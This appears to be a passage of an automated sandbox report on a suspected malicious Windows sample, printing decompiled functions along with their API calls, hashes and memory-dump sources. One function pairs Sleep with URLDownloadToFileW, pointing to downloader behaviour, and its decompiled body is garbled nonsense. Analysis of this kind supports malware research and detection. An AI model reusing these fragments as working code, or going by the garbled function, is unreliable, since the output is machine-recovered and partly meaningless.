						if( *(_t92 + 0x5c) == 0) {
							L14:
							_t125 =  *_t129;
							__eflags = _t125 & 0x00000001;
							if((_t125 & 0x00000001) != 0) {
								goto L18;
							}
							_t87 = E0044B9EF(_t132);
							__eflags = _t87;
							if(_t87 == 0) {
								goto L18;
							}
							_t126 = _t125 | 0x00000001;
							__eflags = _t126;
							 *_t129 = _t126;
							goto L17;
						}
						_t89 = E00439B0E(_t92, _t117, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248,  *(_t92 + 0x5c));
						_t134 = _t134 + 0xc;
						__eflags = _t89;
						if(_t89 != 0) {
							goto L14;
						}
						 *_t129 =  *_t129 | 0x00000002;
						__eflags =  *_t129;
						_t129[2] = _t132;
						_t119 =  *((intOrPtr*)(_t92 + 0x50));
						_t127 = _t119 + 2;
						do {
							_t90 =  *_t119;
							_t119 = _t119 + 2;
							__eflags = _t90 - _v252;
						} while (_t90 != _v252);
						__eflags = _t119 - _t127 >> 1 -  *(_t92 + 0x5c);
						if(_t119 - _t127 >> 1 ==  *(_t92 + 0x5c)) {
							_t129[1] = _t132;
						}
					} else {
						 *_t129 =  *_t129 | 0x00000304;
						_t129[1] = _t132;
						L17:
						_t129[2] = _t132;
					}
					goto L18;
				}
				L1:
				 *_t129 =  *_t129 & 0x00000000;
				goto L2;
			}


































                                                                                                0x0044b59e
                                                                                                0x0044b5a5
                                                                                                0x0044b5b3
                                                                                                0x0044b5bb
                                                                                                0x0044b5ca
                                                                                                0x0044b5d6
                                                                                                0x0044b5ef
                                                                                                0x0044b606
                                                                                                0x0044b60b
                                                                                                0x0044b614
                                                                                                0x0044b616
                                                                                                0x0044b6c9
                                                                                                0x0044b6d2
                                                                                                0x0044b6d4
                                                                                                0x0044b7c6
                                                                                                0x0044b7cd
                                                                                                0x0044b7d0
                                                                                                0x0044b7e0
                                                                                                0x0044b7e0
                                                                                                0x0044b6e7
                                                                                                0x0044b6f8
                                                                                                0x0044b6fe
                                                                                                0x0044b700
                                                                                                0x0044b713
                                                                                                0x0044b71a
                                                                                                0x0044b71c
                                                                                                0x0044b788
                                                                                                0x0044b78b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b78d
                                                                                                0x0044b790
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b79c
                                                                                                0x0044b7a3
                                                                                                0x0044b7a5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b7a7
                                                                                                0x0044b7ac
                                                                                                0x0044b7b4
                                                                                                0x0044b7b6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b7b8
                                                                                                0x0044b7be
                                                                                                0x0044b7c1
                                                                                                0x0044b7c1
                                                                                                0x0044b7c3
                                                                                                0x0044b7c3
                                                                                                0x00000000
                                                                                                0x0044b7c1
                                                                                                0x0044b71e
                                                                                                0x0044b724
                                                                                                0x0044b726
                                                                                                0x0044b729
                                                                                                0x0044b73b
                                                                                                0x0044b73e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b740
                                                                                                0x0044b746
                                                                                                0x0044b74c
                                                                                                0x0044b74c
                                                                                                0x0044b74f
                                                                                                0x0044b752
                                                                                                0x0044b752
                                                                                                0x0044b763
                                                                                                0x0044b766
                                                                                                0x0044b782
                                                                                                0x00000000
                                                                                                0x0044b782
                                                                                                0x0044b768
                                                                                                0x0044b76c
                                                                                                0x0044b774
                                                                                                0x0044b776
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b778
                                                                                                0x0044b77e
                                                                                                0x0044b733
                                                                                                0x0044b733
                                                                                                0x00000000
                                                                                                0x0044b733
                                                                                                0x0044b72b
                                                                                                0x0044b72b
                                                                                                0x0044b72b
                                                                                                0x0044b731
                                                                                                0x00000000
                                                                                                0x0044b731
                                                                                                0x0044b702
                                                                                                0x0044b5f4
                                                                                                0x00000000
                                                                                                0x0044b5f6
                                                                                                0x0044b62a
                                                                                                0x0044b638
                                                                                                0x0044b63e
                                                                                                0x0044b640
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b64c
                                                                                                0x0044b652
                                                                                                0x0044b653
                                                                                                0x0044b655
                                                                                                0x0044b662
                                                                                                0x0044b665
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b667
                                                                                                0x0044b66b
                                                                                                0x0044b6af
                                                                                                0x0044b6af
                                                                                                0x0044b6b1
                                                                                                0x0044b6b4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b6b7
                                                                                                0x0044b6bd
                                                                                                0x0044b6bf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b6c1
                                                                                                0x0044b6c1
                                                                                                0x0044b6c4
                                                                                                0x00000000
                                                                                                0x0044b6c4
                                                                                                0x0044b67a
                                                                                                0x0044b67f
                                                                                                0x0044b682
                                                                                                0x0044b684
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b686
                                                                                                0x0044b686
                                                                                                0x0044b689
                                                                                                0x0044b68c
                                                                                                0x0044b68f
                                                                                                0x0044b692
                                                                                                0x0044b692
                                                                                                0x0044b695
                                                                                                0x0044b698
                                                                                                0x0044b698
                                                                                                0x0044b6a5
                                                                                                0x0044b6a8
                                                                                                0x0044b6aa
                                                                                                0x0044b6aa
                                                                                                0x0044b657
                                                                                                0x0044b657
                                                                                                0x0044b65d
                                                                                                0x0044b6c6
                                                                                                0x0044b6c6
                                                                                                0x0044b6c6
                                                                                                0x00000000
                                                                                                0x0044b655
                                                                                                0x0044b5f1
                                                                                                0x0044b5f1
                                                                                                0x00000000

                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442FC7
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FD4
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044B5E7
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044B638
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044B6F8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                • String ID:
                                                                                                • API String ID: 2829624132-0
                                                                                                • Opcode ID: fe3e842a4429e8705d7bf3d4377f0e36a023bd0f4496e12751f17e35f6674910
                                                                                                • Instruction ID: e58569e80f3c433571db9b71a7952f8bd97f974af6311f6e821d4d0979ade898
                                                                                                • Opcode Fuzzy Hash: fe3e842a4429e8705d7bf3d4377f0e36a023bd0f4496e12751f17e35f6674910
                                                                                                • Instruction Fuzzy Hash: 9B61AF716402079BFB299F25CC82BBAB7B8EF44304F1041BBE905C6685E778D981DB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0042F31F, Relevance: 4.5, APIs: 3, Instructions: 33encryptionCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 68%
                                                                                                			E0042F31F(HCRYPTPROV* __ecx, BYTE* __edx, int _a4) {
				void* _t6;
				BYTE* _t9;
				long** _t10;

				_t10 = __ecx;
				_t9 = __edx;
				if(CryptAcquireContextA(__ecx, 0, 0, 1, 0xf0000000) != 0) {
					if(CryptGenRandom( *_t10, _a4, _t9) != 0) {
						CryptReleaseContext( *_t10, 0);
						return 0;
					}
					_push(0xffffff98);
					L2:
					_pop(_t6);
					return _t6;
				}
				_push(0xffffff99);
				goto L2;
			}






                                                                                                0x0042f32d
                                                                                                0x0042f32f
                                                                                                0x0042f33c
                                                                                                0x0042f351
                                                                                                0x0042f35b
                                                                                                0x00000000
                                                                                                0x0042f361
                                                                                                0x0042f353
                                                                                                0x0042f340
                                                                                                0x0042f340
                                                                                                0x00000000
                                                                                                0x0042f340
                                                                                                0x0042f33e
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000000,?,0042EFD8,00000034,00000000,?,?), ref: 0042F334
                                                                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,0042EFD8,00000034,00000000,?,?), ref: 0042F349
                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0042EFD8,00000034,00000000,?,?), ref: 0042F35B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                • String ID:
                                                                                                • API String ID: 1815803762-0
                                                                                                • Opcode ID: b9d0245aa624595b6df0c0d36c13bb58bf979b86939436b2b3159c8295bd44db
                                                                                                • Instruction ID: 87aeddbda1f256331635c560bef9dc7fe3f883f8c1c4fe2151d7c6a640be0d00
                                                                                                • Opcode Fuzzy Hash: b9d0245aa624595b6df0c0d36c13bb58bf979b86939436b2b3159c8295bd44db
                                                                                                • Instruction Fuzzy Hash: 4AF06531304224BAEB304E55FC04F573A68DBC5BA9FF00136F759D91E0D666D444965C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004306EC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 84%
                                                                                                			E004306EC(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				intOrPtr _t59;
				signed int _t60;
				signed int _t62;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr* _t70;
				intOrPtr _t76;
				intOrPtr _t81;
				intOrPtr* _t83;
				signed int _t84;
				signed int _t87;

				_t81 = __edx;
				 *0x46cd0c =  *0x46cd0c & 0x00000000;
				 *0x46c010 =  *0x46c010 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				 *0x46c010 =  *0x46c010 | 0x00000002;
				 *0x46cd0c = 1;
				_t83 =  &_v44;
				_push(1);
				asm("cpuid");
				_pop(_t67);
				 *_t83 = 0;
				 *((intOrPtr*)(_t83 + 4)) = 1;
				 *((intOrPtr*)(_t83 + 8)) = 0;
				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
				_v12 = _v44;
				_t51 = 1;
				_t76 = 0;
				_push(1);
				asm("cpuid");
				_pop(_t68);
				 *_t83 = _t51;
				 *((intOrPtr*)(_t83 + 4)) = _t67;
				 *((intOrPtr*)(_t83 + 8)) = _t76;
				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
				if((_v32 ^ 0x49656e69 | _v36 ^ 0x6c65746e | _v40 ^ 0x756e6547) != 0) {
					L9:
					_t84 =  *0x46cd10; // 0x2
					L10:
					_v28 = _v32;
					_t53 = _v36;
					_v8 = _t53;
					_v24 = _t53;
					if(_v12 >= 7) {
						_t59 = 7;
						_push(_t68);
						asm("cpuid");
						_t70 =  &_v44;
						 *_t70 = _t59;
						 *((intOrPtr*)(_t70 + 4)) = _t68;
						 *((intOrPtr*)(_t70 + 8)) = 0;
						 *((intOrPtr*)(_t70 + 0xc)) = _t81;
						_t60 = _v40;
						_v20 = _t60;
						_t53 = _v8;
						if((_t60 & 0x00000200) != 0) {
							 *0x46cd10 = _t84 | 0x00000002;
						}
					}
					if((_t53 & 0x00100000) != 0) {
						 *0x46c010 =  *0x46c010 | 0x00000004;
						 *0x46cd0c = 2;
						if((_t53 & 0x08000000) != 0 && (_t53 & 0x10000000) != 0) {
							asm("xgetbv");
							_v16 = _t53;
							_v12 = _t81;
							if((_v16 & 0x00000006) == 6 && 0 == 0) {
								_t56 =  *0x46c010; // 0x2f
								_t57 = _t56 | 0x00000008;
								 *0x46cd0c = 3;
								 *0x46c010 = _t57;
								if((_v20 & 0x00000020) != 0) {
									 *0x46cd0c = 5;
									 *0x46c010 = _t57 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t62 = _v44 & 0x0fff3ff0;
				if(_t62 == 0x106c0 || _t62 == 0x20660 || _t62 == 0x20670 || _t62 == 0x30650 || _t62 == 0x30660 || _t62 == 0x30670) {
					_t87 =  *0x46cd10; // 0x2
					_t84 = _t87 | 0x00000001;
					 *0x46cd10 = _t84;
					goto L10;
				} else {
					goto L9;
				}
			}




























                                                                                                0x004306ec
                                                                                                0x004306ef
                                                                                                0x004306fd
                                                                                                0x0043070c
                                                                                                0x0043087f
                                                                                                0x00430885
                                                                                                0x00430885
                                                                                                0x00430712
                                                                                                0x00430718
                                                                                                0x00430723
                                                                                                0x00430729
                                                                                                0x0043072c
                                                                                                0x0043072d
                                                                                                0x00430731
                                                                                                0x00430732
                                                                                                0x00430734
                                                                                                0x00430737
                                                                                                0x0043073a
                                                                                                0x00430743
                                                                                                0x00430762
                                                                                                0x00430765
                                                                                                0x00430766
                                                                                                0x00430767
                                                                                                0x0043076b
                                                                                                0x0043076c
                                                                                                0x0043076e
                                                                                                0x00430771
                                                                                                0x00430774
                                                                                                0x00430777
                                                                                                0x004307bc
                                                                                                0x004307bc
                                                                                                0x004307c2
                                                                                                0x004307c9
                                                                                                0x004307cc
                                                                                                0x004307cf
                                                                                                0x004307d2
                                                                                                0x004307d5
                                                                                                0x004307d9
                                                                                                0x004307dc
                                                                                                0x004307dd
                                                                                                0x004307e2
                                                                                                0x004307e5
                                                                                                0x004307e7
                                                                                                0x004307ea
                                                                                                0x004307ed
                                                                                                0x004307f0
                                                                                                0x004307f8
                                                                                                0x004307fb
                                                                                                0x004307fe
                                                                                                0x00430803
                                                                                                0x00430803
                                                                                                0x004307fe
                                                                                                0x00430810
                                                                                                0x00430812
                                                                                                0x00430819
                                                                                                0x00430828
                                                                                                0x00430833
                                                                                                0x00430836
                                                                                                0x00430839
                                                                                                0x0043084a
                                                                                                0x00430850
                                                                                                0x00430855
                                                                                                0x00430858
                                                                                                0x00430866
                                                                                                0x0043086b
                                                                                                0x00430870
                                                                                                0x0043087a
                                                                                                0x0043087a
                                                                                                0x0043086b
                                                                                                0x0043084a
                                                                                                0x00430828
                                                                                                0x00000000
                                                                                                0x00430810
                                                                                                0x0043077c
                                                                                                0x00430786
                                                                                                0x004307ab
                                                                                                0x004307b1
                                                                                                0x004307b4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00430705
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FeaturePresentProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 2325560087-3916222277
                                                                                                • Opcode ID: 9f08225024835df3990a6cf90e4c90edfcd3b73904c5080c3b2acbd964008185
                                                                                                • Instruction ID: 456b76d3776973fc303f647ab5b95cb9742011e054d046ee5c379f2f5a7336e6
                                                                                                • Opcode Fuzzy Hash: 9f08225024835df3990a6cf90e4c90edfcd3b73904c5080c3b2acbd964008185
                                                                                                • Instruction Fuzzy Hash: 1041C3B19002049FDB18CF9AD89576ABBF4FB48314F10863BD855D7351E3B8A950CF99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00443640, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0043EFFF,?,00000004), ref: 00443693
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: GetLocaleInfoEx
                                                                                                • API String ID: 2299586839-2904428671
                                                                                                • Opcode ID: 7ddf3d13d3629e1920d14a51344600cf04258e3dd427b704043c150667c3a513
                                                                                                • Instruction ID: 080b3d49580c50e22c117b6e99cb4a48ef71976f9c5b2cdc6a5989f3a97ea209
                                                                                                • Opcode Fuzzy Hash: 7ddf3d13d3629e1920d14a51344600cf04258e3dd427b704043c150667c3a513
                                                                                                • Instruction Fuzzy Hash: C3F0F631641718F7DB11AFA19C01F6E7BA1EF44B12F11415AFC091A251CA759E209A9E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00413468, Relevance: 3.1, APIs: 2, Instructions: 66sleepfilenetworkCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 68%
                                                                                                			E00413468(signed int __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi) {
				void* _t53;
				signed int _t54;
				char _t61;
				void* _t62;
				void* _t67;
				signed char _t68;
				intOrPtr* _t72;
				void* _t76;
				void* _t77;
				signed char _t78;
				signed int* _t81;
				signed int* _t82;
				signed int* _t83;
				signed int* _t85;
				signed int* _t86;
				signed int* _t87;
				signed int _t94;
				void* _t97;
				void* _t98;
				signed int* _t100;
				signed int* _t103;
				signed int* _t104;
				signed int* _t105;
				intOrPtr* _t107;
				signed int* _t108;
				intOrPtr* _t109;
				void* _t113;
				void* _t116;

				_t110 = __esi;
				_t109 = __edi;
				asm("scasb");
				 *__eax =  *__eax | __eax;
				_t53 = __eax + __ecx;
				E0040ADA8();
				asm("pushad");
				_t72 = __ebx + _t53;
				asm("das");
				 *((intOrPtr*)(__edx + 0x39)) =  *((intOrPtr*)(__edx + 0x39)) + _t72;
				_t76 = __ecx + 3;
				_t107 = __edx + _t76;
				_t77 = _t76 + 1;
				_t54 = _t53 + _t77;
				asm("das");
				_t78 = _t77 + 1;
				 *_t54 =  *_t54 + _t107;
				 *_t78 =  *_t78 ^ _t54;
				 *_t54 =  *_t54 << _t78;
				 *((intOrPtr*)(_t113 + 0x30)) =  *((intOrPtr*)(_t113 + 0x30)) + _t107;
				 *((intOrPtr*)(_t107 + 0x30)) =  *((intOrPtr*)(_t107 + 0x30)) + _t72;
				_t81 = _t78 + 3;
				 *((intOrPtr*)(_t81 - 0x5affbed0)) =  *((intOrPtr*)(_t81 - 0x5affbed0)) + _t54;
				 *_t81 =  *_t81 ^ _t54;
				asm("fnsave [eax]");
				_t82 =  &(_t81[0]);
				 *__edi =  *__edi + _t107;
				 *_t82 =  *_t82 ^ _t54;
				if( *_t82 < 0) {
					_t100 =  &(_t82[0]);
					 *((intOrPtr*)(_t107 + 0x1f004131)) =  *((intOrPtr*)(_t107 + 0x1f004131)) + _t54;
					_t68 = _t54 ^  *_t100;
					_t110 = __esi -  *_t107;
					 *((intOrPtr*)(_t68 + 0x32)) =  *((intOrPtr*)(_t68 + 0x32)) + _t107;
					 *((intOrPtr*)(__edi + 0x32)) =  *((intOrPtr*)(__edi + 0x32)) + _t72;
					_t103 =  &(_t100[0]);
					 *((intOrPtr*)(_t110 + 0x32)) =  *((intOrPtr*)(_t110 + 0x32)) + _t103;
					_t104 =  &(_t103[0]);
					 *((intOrPtr*)(_t72 - 0x3bffbece)) =  *((intOrPtr*)(_t72 - 0x3bffbece)) + _t107;
					asm("les edi, [ecx]");
					_t105 =  &(_t104[0]);
					_t107 = _t107 + _t105;
					_t82 =  &(_t105[0]);
					_t54 = (_t68 ^  *_t104) + _t107 ^  *_t82;
				}
				 *_t54 =  *_t54 + _t72;
				_t116 = _t113 - 1;
				asm("in eax, dx");
				_t83 =  &(_t82[0]);
				 *((intOrPtr*)(_t107 + 0x34)) =  *((intOrPtr*)(_t107 + 0x34)) + _t83;
				 *((intOrPtr*)(_t109 + 0x34)) =  *((intOrPtr*)(_t109 + 0x34)) + _t72;
				_t85 =  &(_t83[0]);
				 *((intOrPtr*)(_t116 + _t110 + 0x41)) =  *((intOrPtr*)(_t116 + _t110 + 0x41)) + _t85;
				 *((intOrPtr*)(_t110 + 0x34)) =  *((intOrPtr*)(_t110 + 0x34)) + _t72;
				_t86 =  &(_t85[0]);
				 *((intOrPtr*)(_t110 + 0x357f0041)) =  *((intOrPtr*)(_t110 + 0x357f0041)) + _t86;
				_t87 =  &(_t86[0]);
				 *_t72 =  *_t72 + _t87;
				 *((intOrPtr*)(_t107 + 0x18004137)) =  *((intOrPtr*)(_t107 + 0x18004137)) + _t107;
				asm("aaa");
				 *((intOrPtr*)(_t109 + 0x14004137)) =  *((intOrPtr*)(_t109 + 0x14004137)) + _t107;
				_t61 = (_t54 ^  *_t82 ^  *_t82 ^  *_t82 ^  *_t82) - 0x33;
				 *0xc2004138 = _t61;
				asm("loop 0x3a");
				 *_t107 =  *_t107 + _t61;
				_pop(_t108);
				asm("out dx, al");
				 *_t109 =  *_t109 + _t108;
				 *((intOrPtr*)(_t116 + _t109)) =  *((intOrPtr*)(_t116 + _t109)) + _t72;
				 *((intOrPtr*)(_t116 + _t109 + 0x3cd40041)) =  *((intOrPtr*)(_t116 + _t109 + 0x3cd40041)) + _t108;
				_t94 =  &(_t87[1]);
				_t62 = _t61 + _t108;
				if(_t62 !=  *_t94) {
					 *((intOrPtr*)(_t116 + _t109 + 0x3d7a0041)) =  *((intOrPtr*)(_t116 + _t109 + 0x3d7a0041)) + _t108;
					_t97 = _t94 + 2;
					 *((intOrPtr*)(_t97 - 0x77ffbec3)) =  *((intOrPtr*)(_t97 - 0x77ffbec3)) + _t62;
					_t98 = _t97 + 1;
					_t67 = _t62 + _t108;
					 *((intOrPtr*)(_t109 - 0x1ffbec3)) =  *((intOrPtr*)(_t109 - 0x1ffbec3)) + _t98;
					 *((intOrPtr*)(_t116 + _t109)) =  *((intOrPtr*)(_t116 + _t109)) + _t98;
					 *_t72 =  *_t72 + _t108;
					_t94 = _t98 + 1 + _t67;
					asm("out dx, al");
					asm("adc al, [ecx]");
					asm("adc al, [edx]");
					_t108 = _t108 +  *_t108;
					_t62 = _t67 + 5;
					_push(es);
				}
				_pop(es);
				asm("adc dl, [edx]");
				asm("adc cl, [eax]");
				 *_t108 =  *_t108 | _t94;
				asm("adc cl, [ebx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc [esi-0x75], edx");
				_push(_t110);
				E004047EF(0);
				return _t94;
			}































                                                                                                0x00413468
                                                                                                0x00413468
                                                                                                0x00413468
                                                                                                0x00413469
                                                                                                0x0041346b
                                                                                                0x00413e1a
                                                                                                0x00413e22
                                                                                                0x00413e25
                                                                                                0x00413e27
                                                                                                0x00413e29
                                                                                                0x00413e2c
                                                                                                0x00413e2d
                                                                                                0x00413e34
                                                                                                0x00413e35
                                                                                                0x00413e37
                                                                                                0x00413e38
                                                                                                0x00413e39
                                                                                                0x00413e3b
                                                                                                0x00413e3e
                                                                                                0x00413e41
                                                                                                0x00413e45
                                                                                                0x00413e48
                                                                                                0x00413e49
                                                                                                0x00413e4f
                                                                                                0x00413e52
                                                                                                0x00413e54
                                                                                                0x00413e55
                                                                                                0x00413e57
                                                                                                0x00413e5a
                                                                                                0x00413e5c
                                                                                                0x00413e5d
                                                                                                0x00413e63
                                                                                                0x00413e66
                                                                                                0x00413e69
                                                                                                0x00413e6d
                                                                                                0x00413e70
                                                                                                0x00413e71
                                                                                                0x00413e74
                                                                                                0x00413e75
                                                                                                0x00413e7e
                                                                                                0x00413e80
                                                                                                0x00413e81
                                                                                                0x00413e88
                                                                                                0x00413e8b
                                                                                                0x00413e8b
                                                                                                0x00413e8d
                                                                                                0x00413e96
                                                                                                0x00413e9a
                                                                                                0x00413ea0
                                                                                                0x00413ea1
                                                                                                0x00413ea5
                                                                                                0x00413ea8
                                                                                                0x00413ea9
                                                                                                0x00413ead
                                                                                                0x00413eb0
                                                                                                0x00413eb1
                                                                                                0x00413eb8
                                                                                                0x00413eb9
                                                                                                0x00413ebd
                                                                                                0x00413ec3
                                                                                                0x00413ec5
                                                                                                0x00413ed2
                                                                                                0x00413ed6
                                                                                                0x00413ede
                                                                                                0x00413ee1
                                                                                                0x00413ee6
                                                                                                0x00413eea
                                                                                                0x00413ef1
                                                                                                0x00413ef9
                                                                                                0x00413efd
                                                                                                0x00413f04
                                                                                                0x00413f05
                                                                                                0x00413f0a
                                                                                                0x00413f0d
                                                                                                0x00413f14
                                                                                                0x00413f15
                                                                                                0x00413f20
                                                                                                0x00413f21
                                                                                                0x00413f25
                                                                                                0x00413f2d
                                                                                                0x00413f31
                                                                                                0x00413f35
                                                                                                0x00413f3a
                                                                                                0x00413f3f
                                                                                                0x00413f41
                                                                                                0x00413f43
                                                                                                0x00413f45
                                                                                                0x00413f47
                                                                                                0x00413f47
                                                                                                0x00413f48
                                                                                                0x00413f49
                                                                                                0x00413f4b
                                                                                                0x00413f4d
                                                                                                0x00413f4f
                                                                                                0x00413f53
                                                                                                0x00413f55
                                                                                                0x00413f57
                                                                                                0x00413f5e
                                                                                                0x00413f60
                                                                                                0x00413f61
                                                                                                0x00413f69
                                                                                                0x00413f71

                                                                                                APIs
                                                                                                • Sleep.KERNEL32 ref: 00413478
                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004134DA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DownloadFileSleep
                                                                                                • String ID:
                                                                                                • API String ID: 1931167962-0
                                                                                                • Opcode ID: 374d7494772fcb54fb22f0e3f905a91e2fb7e260f72e85f0dff5b57a84a5e570
                                                                                                • Instruction ID: a6d5dc11dd979872b0cac11f331f754c96155ea3453581b37262b410353ea2f2
                                                                                                • Opcode Fuzzy Hash: 374d7494772fcb54fb22f0e3f905a91e2fb7e260f72e85f0dff5b57a84a5e570
                                                                                                • Instruction Fuzzy Hash: A511B7716083015BC714FFB2DC969AE77A4AF51308F40097FF846960E2EF7C9949C65A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044B7E3, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 59%
                                                                                                			E0044B7E3(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebp;
				signed int _t16;
				signed int _t22;
				void* _t24;
				void* _t31;
				void* _t35;
				signed int* _t50;
				int _t53;
				signed int _t54;

				_t16 =  *0x46c00c; // 0x4cc22724
				_v8 = _t16 ^ _t54;
				_t35 = E00442F68(__ebx, __ecx, __edx);
				_t50 =  *(E00442F68(_t35, __ecx, __edx) + 0x34c);
				_t53 = E0044B8BB(_a4);
				asm("sbb ecx, ecx");
				_t22 = GetLocaleInfoW(_t53, ( ~( *(_t35 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t22 != 0) {
